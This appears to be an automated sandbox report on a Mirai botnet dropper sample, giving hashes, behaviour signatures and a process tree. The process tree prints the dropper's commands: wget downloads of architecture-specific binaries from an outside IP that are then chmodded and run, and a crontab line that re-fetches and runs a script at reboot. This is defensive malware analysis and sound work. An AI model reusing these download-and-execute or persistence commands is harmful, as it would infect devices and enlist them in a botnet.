Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
29-12-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
Resource
debian9-mipsel-20240729-en
General
-
Target
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
-
Size
610B
-
MD5
92d13edccd8d4b5832ee62c441c24785
-
SHA1
dbb27ddb5dca8aead2e72e887c24cfce68947a22
-
SHA256
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f
-
SHA512
d3f9223e692eff6ec1e5067555f05bf676489959fddddf3f890afa8006ae0c27500d61fabfcff3d14d1f03acd0f573b1cd61a1ee78ce16e9da4b075a03cd606a
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1529 chmod 1547 sh 1521 chmod 1525 chmod 1533 chmod 1537 chmod 1541 chmod 1545 chmod 1511 chmod 1517 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /run/user/0/upnp 1518 upnp /run/user/0/upnp 1522 upnp /run/user/0/upnp 1526 upnp /run/user/0/upnp 1530 upnp /run/user/0/upnp 1534 upnp /run/user/0/upnp 1538 upnp /run/user/0/upnp 1542 upnp /run/user/0/upnp 1546 upnp -
Renames itself 1 IoCs
pid Process 1546 upnp -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 51.158.108.203 Destination IP 168.235.111.72 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.KGfHT3 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd 1546 upnp -
description ioc Process File opened for reading /proc/85/stat killall File opened for reading /proc/115/stat killall File opened for reading /proc/964/stat killall File opened for reading /proc/203/cmdline killall File opened for reading /proc/1118/cmdline killall File opened for reading /proc/1303/stat killall File opened for reading /proc/449/stat killall File opened for reading /proc/521/stat killall File opened for reading /proc/1182/stat killall File opened for reading /proc/174/stat killall File opened for reading /proc/1308/stat killall File opened for reading /proc/602/stat killall File opened for reading /proc/1065/stat killall File opened for reading /proc/1130/cmdline killall File opened for reading /proc/1139/stat killall File opened for reading /proc/1166/stat killall File opened for reading /proc/1185/stat killall File opened for reading /proc/24/stat killall File opened for reading /proc/78/stat killall File opened for reading /proc/1150/stat killall File opened for reading /proc/79/stat killall File opened for reading /proc/169/stat killall File opened for reading /proc/533/cmdline killall File opened for reading /proc/964/cmdline killall File opened for reading /proc/1126/cmdline killall File opened for reading /proc/7/stat killall File opened for reading /proc/159/stat killall File opened for reading /proc/1094/stat killall File opened for reading /proc/1284/stat killall File opened for reading /proc/84/stat killall File opened for reading /proc/953/cmdline killall File opened for reading /proc/1085/stat killall File opened for reading /proc/1146/stat killall File opened for reading /proc/958/stat killall File opened for reading /proc/317/cmdline killall File opened for reading /proc/15/stat killall File opened for reading /proc/740/stat killall File opened for reading /proc/10/stat killall File opened for reading /proc/14/stat killall File opened for reading /proc/32/stat killall File opened for reading /proc/245/stat killall File opened for reading /proc/445/stat killall File opened for reading /proc/574/stat killall File opened for reading /proc/1282/cmdline killall File opened for reading /proc/20/stat killall File opened for reading /proc/1232/stat killall File opened for reading /proc/1/stat killall File opened for reading /proc/8/stat killall File opened for reading /proc/79/cmdline killall File opened for reading /proc/81/stat killall File opened for reading /proc/1294/stat killall File opened for reading /proc/filesystems cp File opened for reading /proc/18/stat killall File opened for reading /proc/678/stat killall File opened for reading /proc/1104/cmdline killall File opened for reading /proc/16/stat killall File opened for reading /proc/158/stat killall File opened for reading /proc/160/stat killall File opened for reading /proc/1065/cmdline killall File opened for reading /proc/1153/stat killall File opened for reading /proc/1338/stat killall File opened for reading /proc/1072/stat killall File opened for reading /proc/6/stat killall File opened for reading /proc/948/stat killall -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1534 upnp 1532 wget -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/.a 8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.a 8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
Processes
-
/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown1⤵
- Writes file to shm directory
- Writes file to tmp directory
PID:1497 -
/usr/bin/killallkillall -9 dvrLocker2⤵
- Reads runtime system information
PID:1498
-
-
/usr/bin/cutcut -d " " -f 22⤵PID:1504
-
-
/bin/grepgrep -v noexe2⤵PID:1503
-
-
/bin/grepgrep rw2⤵PID:1502
-
-
/bin/grepgrep tmpfs2⤵PID:1501
-
-
/bin/catcat /proc/mounts2⤵PID:1500
-
-
/bin/rmrm -rf .a .f2⤵PID:1505
-
-
/bin/rmrm -rf .a .f2⤵PID:1506
-
-
/bin/rmrm -rf .a .f2⤵PID:1507
-
-
/bin/cpcp /proc/self/exe .f2⤵
- Reads runtime system information
PID:1509
-
-
/bin/chmodchmod 777 .f2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/bin/rmrm -rf upnp2⤵PID:1512
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm -O -2⤵PID:1513
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/run/user/0/upnp./upnp tplink.arm2⤵
- Executes dropped EXE
PID:1518
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm5 -O -2⤵PID:1520
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/run/user/0/upnp./upnp tplink.arm52⤵
- Executes dropped EXE
PID:1522
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵PID:1524
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/run/user/0/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
PID:1526
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵PID:1528
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/run/user/0/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
PID:1530
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mips -O -2⤵
- System Network Configuration Discovery
PID:1532
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/run/user/0/upnp./upnp tplink.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1534
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mpsl -O -2⤵PID:1536
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/run/user/0/upnp./upnp tplink.mpsl2⤵
- Executes dropped EXE
PID:1538
-
-
/usr/bin/wgetwget http://103.188.82.218/t/ppc -O -2⤵PID:1540
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/run/user/0/upnp./upnp tplink.ppc2⤵
- Executes dropped EXE
PID:1542
-
-
/usr/bin/wgetwget http://103.188.82.218/t/x86 -O -2⤵PID:1544
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/run/user/0/upnp./upnp tplink.x862⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
PID:1546 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:1547 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1549
-
-
/usr/bin/crontabcrontab -l4⤵PID:1550
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
138KB
MD5f7d53f25b67715fd4959eb7787de7902
SHA127860d9e8de0d83600fdbb4e8734af72fa638e50
SHA256007d90bd141b2cdbd3cbc5e5f472b3144d122440c73a46d58ee61df2dd71e56e
SHA51214283c5f84a96eac1a8bcd495c52105dbef9bb0fe0404dde3e5eb7531ab54bedd83e4ccfadb23c5572533979887aca54745854d3bf05cc30306e23b9713b5a3c
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
85KB
MD5d8b9115310ca0429f6ec2473696156a2
SHA15497d765ad0b6ad6ed2204338faecd9671f6a60c
SHA2567f089801a37f1d9a83a5103c8f9b1c6fc00f9ce699cb812cc23704aea8d46c8c
SHA512a3adc2f2a36bdf40bda9e592f03bf51c3a3e7954fbeb8e52d1517537c72efc7df2d22e8be0d1ac85b768aacb45bd77cabb0ced0885ac96c17252b8af63cdb664
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
100KB
MD56eacc766bbc8a29a3c5b247214052e51
SHA1c214bd410358cb95ca8f71f90780a8d064319683
SHA256cb727a0517434be1c4b64e19182888e449be71fadcca1a6bfb60fc8791d1d13d
SHA512e3cdf8154cbd7b6769533eb3c0aebec3a9e62242a218068a7105b0f0df023cb42c2366f48f720a4534b6265cc8997617e947cb0ae9a0bb04394754185819c0a9
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
306B
MD542e4105ba4aea051080f8b9734100b29
SHA10d71e81438acfa921c47878649d8db77c624f047
SHA256f4225cd66ca4db30216340e3d01cfd0131c76bc36156cab4ada0048ed9cb0606
SHA5123104b08687dfa2bb31e0db931f1806c18904742e34a0637facc511c15770d2c5a54768a47ce0428cd94c3cda1c582aaf24e1d97ba38cfeef8e8f9d61cfb72e3b